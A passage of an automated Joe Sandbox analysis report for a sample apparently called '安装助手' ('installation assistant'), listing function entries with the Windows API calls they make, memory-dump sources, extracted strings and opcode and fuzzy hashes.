                                        • __EH_prolog.LIBCMT ref: 6C126CE5
                                          • Part of subcall function 6C0FCC2A: __EH_prolog.LIBCMT ref: 6C0FCC2F
                                          • Part of subcall function 6C0FE6A6: __EH_prolog.LIBCMT ref: 6C0FE6AB
                                          • Part of subcall function 6C126A0E: __EH_prolog.LIBCMT ref: 6C126A13
                                          • Part of subcall function 6C126837: __EH_prolog.LIBCMT ref: 6C12683C
                                          • Part of subcall function 6C12A143: __EH_prolog.LIBCMT ref: 6C12A148
                                          • Part of subcall function 6C12A143: ctype.LIBCPMT ref: 6C12A16C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog$ctype
                                        • String ID:
                                        • API String ID: 1039218491-3916222277
                                        • Opcode ID: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                                        • Instruction ID: c01e1893ff9d60acb9fcf21ec4de210c0987752bd5d408ff90c073c0a8432713
                                        • Opcode Fuzzy Hash: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                                        • Instruction Fuzzy Hash: 1B03BD35805288DFDF11CFA4C890BDDBBB0AF15318F24809AD85567A91DB386BCADF61
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 3J$`/J$`1J$p0J
                                        • API String ID: 0-2826663437
                                        • Opcode ID: 0ce0cf568756059b319bec402cc4c845d2048d3ed56d6c8deb0de92fa915ba20
                                        • Instruction ID: 3120bf5f48c562fb2cfdf70ec870aeb26ffcc9edb856feb0f2bdef9e50ef3c3a
                                        • Opcode Fuzzy Hash: 0ce0cf568756059b319bec402cc4c845d2048d3ed56d6c8deb0de92fa915ba20
                                        • Instruction Fuzzy Hash: 7941F772F10A201AB3488E6A8C855667FC3C7CA347B4AC33DD565C76D9DABDC50782A4
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: W
                                        • API String ID: 3519838083-655174618
                                        • Opcode ID: ea00faa881669fc0c82860575f49db2074e6a46241474c433f0857494c018303
                                        • Instruction ID: 937262d0fed2318ca7d0d276ab902d83268d28a945e1c009af3e3e2558cee81c
                                        • Opcode Fuzzy Hash: ea00faa881669fc0c82860575f49db2074e6a46241474c433f0857494c018303
                                        • Instruction Fuzzy Hash: 8AB28AB4A01259DFDB01CFA8C484B9EBBB4BF19318F244099E865EB782C775ED51CB60
                                        APIs
                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6C0D0279
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6C0D0283
                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 6C0D0290
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                        • String ID:
                                        • API String ID: 3906539128-0
                                        • Opcode ID: 7acaf03aa0363c1224a611c894b8db40f360b623524d0509f4d6957d964a5e91
                                        • Instruction ID: 03a90fabd25b6d492cc20120d4c2e2d676172c10174cf3cf0dce6b527f54d733
                                        • Opcode Fuzzy Hash: 7acaf03aa0363c1224a611c894b8db40f360b623524d0509f4d6957d964a5e91
                                        • Instruction Fuzzy Hash: BD31B774E01218ABCB21DF68D9887DDBBF4BF08314F5042DAE51DA7650EB709B858F45
                                        APIs
                                        • GetCurrentProcess.KERNEL32(?,?,6C0CF235,?,?,?,?), ref: 6C0CF19F
                                        • TerminateProcess.KERNEL32(00000000,?,6C0CF235,?,?,?,?), ref: 6C0CF1A6
                                        • ExitProcess.KERNEL32 ref: 6C0CF1B8
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: Process$CurrentExitTerminate
                                        • String ID:
                                        • API String ID: 1703294689-0
                                        • Opcode ID: 6e9936dcb1352f8c88cd360ddaf7bb6e0f90317362cc706aaf573c2e5440f3be
                                        • Instruction ID: d1c72ed13847ed910d61d993d5b414a70bc9e8ff2536044e79cb66c4657fbe9b
                                        • Opcode Fuzzy Hash: 6e9936dcb1352f8c88cd360ddaf7bb6e0f90317362cc706aaf573c2e5440f3be
                                        • Instruction Fuzzy Hash: 4AE0B632201108AFCF026F95D918A8D3BB9FB46A56F164414FC29C6621CF35E981DA92
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 6C14489B
                                          • Part of subcall function 6C145FC9: __EH_prolog.LIBCMT ref: 6C145FCE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: @ K
                                        • API String ID: 3519838083-4216449128
                                        • Opcode ID: 2aafbb27e948f5792f5f0ae65a5e3f4f4742fa89f16e976c1927d8ca4eeab830
                                        • Instruction ID: 872061e5417442687b3bac7942a2be224763036e0358beca90b3a67024208f50
                                        • Opcode Fuzzy Hash: 2aafbb27e948f5792f5f0ae65a5e3f4f4742fa89f16e976c1927d8ca4eeab830
                                        • Instruction Fuzzy Hash: 70D1F371D042148FEB14CFA4C490BDEB7B6FF94318F29C16AE416ABB84CB749885CB55
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: x=J
                                        • API String ID: 3519838083-1497497802
                                        • Opcode ID: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                                        • Instruction ID: ba0288290c599f86e3bae185afd0ff35913dbe03b3e28629e228c443b0d97bef
                                        • Opcode Fuzzy Hash: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                                        • Instruction Fuzzy Hash: 6F916831D011199ADB04DFA5D890BEDB7F1AF46308F20816ADC7167AA1DB3269CBCB90
                                        APIs
                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6C0C78B0
                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6C0C80D3
                                          • Part of subcall function 6C0C9379: RaiseException.KERNEL32(E06D7363,00000001,00000003,6C0C80BC,00000000,?,?,?,6C0C80BC,?,6C0F554C), ref: 6C0C93D9
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ExceptionFeaturePresentProcessorRaisestd::invalid_argument::invalid_argument
                                        • String ID:
                                        • API String ID: 915016180-0
                                        • Opcode ID: 46b762ee4661e129b6501066dc4a05b7ec9893f6245c2d52b87f1f509d2b3429
                                        • Instruction ID: d4c738fa4723d940a197b13b042615ae257066c6dae3576c4e5d5d7867da4c1f
                                        • Opcode Fuzzy Hash: 46b762ee4661e129b6501066dc4a05b7ec9893f6245c2d52b87f1f509d2b3429
                                        • Instruction Fuzzy Hash: 99B17E71A046059BDB09CF95C8817DDBBF4FB45318F64822AE826E7B80D33CAA45CF95
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 9c3421dad5d14781272ec358f91f3a3ab5cfaafabcf0205709a2c9463218eeaf
                                        • Instruction ID: c505504f47e8aa6eae6751670dcfd67428f1639864a5f571528372ba9470882d
                                        • Opcode Fuzzy Hash: 9c3421dad5d14781272ec358f91f3a3ab5cfaafabcf0205709a2c9463218eeaf
                                        • Instruction Fuzzy Hash: 8DB2AB30A04758CFDB21CF6AC894B9EBBF1BF15308F508599D49AA7E81D770A999CF40
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @4J$DsL
                                        • API String ID: 0-2004129199
                                        • Opcode ID: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                                        • Instruction ID: 5c37e069a27c3dc725e8371fdd8aecba8c25768d5dd8080c456a6969e7972db0
                                        • Opcode Fuzzy Hash: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                                        • Instruction Fuzzy Hash: 19219137AA49564BE74CCA28DC33EBD2681E744305B89527EED4BCB3D1DF5C8800C648
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @
                                        • API String ID: 0-2766056989
                                        • Opcode ID: f76254a8391bbbc56ee5761849d9b464ca1ca2a3d131f1b477d5a7e0a80fcda2
                                        • Instruction ID: 49ebd66112e3d0b43613f2808680e9f097adbc7e5ddbdbb07ff639ac0f7f796a
                                        • Opcode Fuzzy Hash: f76254a8391bbbc56ee5761849d9b464ca1ca2a3d131f1b477d5a7e0a80fcda2
                                        • Instruction Fuzzy Hash: 8D1207B29083158FC358DF4AD44045BF7E2BFC8714F1A8A2EE898A7311D770E9568BC6
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: __aullrem
                                        • String ID:
                                        • API String ID: 3758378126-0
                                        • Opcode ID: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                                        • Instruction ID: 50d5082ef6da613dc81bc1b19770fe4eb4c46f638e6ec5483098e187c860ae07
                                        • Opcode Fuzzy Hash: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                                        • Instruction Fuzzy Hash: 4551C971B092859BD710CF5AC4C06EDFBF6EF7A214F18C05EE8C897242D27A599AC760
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @
                                        • API String ID: 0-2766056989
                                        • Opcode ID: b4ce60841bca8fd945d7956f1acfe73c36a86ce5a82225692ce6a5b8030d2b38
                                        • Instruction ID: 9dd2b283d96eb3d05bca565892915ea06993caf347f6e85d4e70024111aa31a6
                                        • Opcode Fuzzy Hash: b4ce60841bca8fd945d7956f1acfe73c36a86ce5a82225692ce6a5b8030d2b38
                                        • Instruction Fuzzy Hash: 01D13E729083148FC758DF4AD44005BF7E2BFC8314F1A892EF899A7315DB70A9568BC6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (SL
                                        • API String ID: 0-669240678
                                        • Opcode ID: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                                        • Instruction ID: be20a771e9f4fae7c8cc5fadad3daed552eeb89efd3b5996adcad8ba752af892
                                        • Opcode Fuzzy Hash: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                                        • Instruction Fuzzy Hash: 52519473E208214AD78CCE24DC2177572D2E784310F8BC2B99D8BAB6E6CD78989187C4
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c5d8fce23cbaa16ca4a411120887c85bd9f222070fcab5a8c777e9c9c2b1bfe3
                                        • Instruction ID: bb2f2e36709519b2c142c8e399df66d165467e0742ca2cf5170679b261f0e6a6
                                        • Opcode Fuzzy Hash: c5d8fce23cbaa16ca4a411120887c85bd9f222070fcab5a8c777e9c9c2b1bfe3
                                        • Instruction Fuzzy Hash: E4728DB26042268FD748CF19C490258FBE1FF89314B5A46ADD95ADBB42DB30E8D5CBC1
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bb173c08d896bf76c8f12b9495eb2c2eeed1eb95d4f1202fd14126b970d45cbc
                                        • Instruction ID: f051f8f11f78ce0937dee0506cb447d5043a9eebf53bcec879fbd9d72ab4def6
                                        • Opcode Fuzzy Hash: bb173c08d896bf76c8f12b9495eb2c2eeed1eb95d4f1202fd14126b970d45cbc
                                        • Instruction Fuzzy Hash: 9C62F0B1A0E3448FC714CF29C48061ABBE6BFD9744F248A2EE89987755D770E845CF92
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a58f6c5b0b87d5f12fe17b5b5b78f65cee349bf84e9962db46f9d84bc39cd103
                                        • Instruction ID: d6746bca3ca14d9155fdd92eedb219523e85978a9b985840dd65f6d7ca8715af
                                        • Opcode Fuzzy Hash: a58f6c5b0b87d5f12fe17b5b5b78f65cee349bf84e9962db46f9d84bc39cd103
                                        • Instruction Fuzzy Hash: 95428F71619B058FD328CF69C8907AAB3E2FB84314F044A2EE996C7B94E774E549CF41
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dc8004adaa3259f52bc6ab735d8be8844deca4391a1dba6202427b66ce1407bc
                                        • Instruction ID: 6956df82b2464c07b92ef2648d9ff3cf89cf4ccd0bc17f5f362d629da14b6a12
                                        • Opcode Fuzzy Hash: dc8004adaa3259f52bc6ab735d8be8844deca4391a1dba6202427b66ce1407bc
                                        • Instruction Fuzzy Hash: 3402E673A0D35147D718CE1DC8A0219B7E7BBC0390F6F4A2EE89647794DAB49946CF81
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f4c3878cdf6dda1e5ca36c24f377bc52bcf6993d29949e9196dea34e7f5de905
                                        • Instruction ID: 4472c5ba3a85a9a71b46e0a633984496866f090bf580c2181b6f4436c0d1ad5b
                                        • Opcode Fuzzy Hash: f4c3878cdf6dda1e5ca36c24f377bc52bcf6993d29949e9196dea34e7f5de905
                                        • Instruction Fuzzy Hash: D4022732A0C2118BD319CE2CC4A0359BBF6FBC4355F194B2EE596A7A94DB74D844CF92
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 04f499f9e3d4c93c3ee3b28235ad2abed55ba3d5e2a4d0777d40b1e79efdc42e
                                        • Instruction ID: f35aeb95f9f847cbff9af7e712a89209a7f43338ba5f12240255898ab45e0f13
                                        • Opcode Fuzzy Hash: 04f499f9e3d4c93c3ee3b28235ad2abed55ba3d5e2a4d0777d40b1e79efdc42e
                                        • Instruction Fuzzy Hash: 8412B034609B518FC324CF2EC490626FBF2AF86304F188A6ED5D687A95D739E548CF91
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 70a9c9e80daef2df3b25ccf8549349f6a1d4fdfd7731b9f920c9a3da36d7342a
                                        • Instruction ID: 93dfcba3cdaecb48c0bcf7b0edd3c77a51d418f7de854c1182c2cda5ad951561
                                        • Opcode Fuzzy Hash: 70a9c9e80daef2df3b25ccf8549349f6a1d4fdfd7731b9f920c9a3da36d7342a
                                        • Instruction Fuzzy Hash: 19E1EF71704B058BE734CF28D4603AAB7E2EBC5314F544A2DC6A6C7B81DB75E50ACBA1
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2bbd660b0b6b3ed67628fad2252f6cf995a3246cee064cb0bfa737aff63ec289
                                        • Instruction ID: 613d83b9453368c144d639048aba0c65a9c9862232b2a9671d57c5cf74941849
                                        • Opcode Fuzzy Hash: 2bbd660b0b6b3ed67628fad2252f6cf995a3246cee064cb0bfa737aff63ec289
                                        • Instruction Fuzzy Hash: 7CF1A170609B518FC328CF2DD490266FBE2BF89304F184A6EE5D68BA91D339E554CF91
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b0f25bae375294626f84eebbb02985cc894b79d37dbce9afd4d280b88824898c
                                        • Instruction ID: 39b397a349ccb84e177d0ebd5ea5637cc82f777f94fae960de8d410a98c43482
                                        • Opcode Fuzzy Hash: b0f25bae375294626f84eebbb02985cc894b79d37dbce9afd4d280b88824898c
                                        • Instruction Fuzzy Hash: EAF1DF70509B618BC328DF29D4A026AFBF2BF85304F188B2ED5D68BA91D339E155CF51
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2d001f70021adf80f04e27e8359f5713b9c218b059c1a64901c9b96791ed9031
                                        • Instruction ID: 4302d46d12f2b10df6c9c8f133d12a6ce31e51e81fcb86073c8f36250af388ba
                                        • Opcode Fuzzy Hash: 2d001f70021adf80f04e27e8359f5713b9c218b059c1a64901c9b96791ed9031
                                        • Instruction Fuzzy Hash: 7FC1E271604B0A8BE338CF29C4902AAB7E2FBD4314F158A2DC2A6C7B45D774F495CB90
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
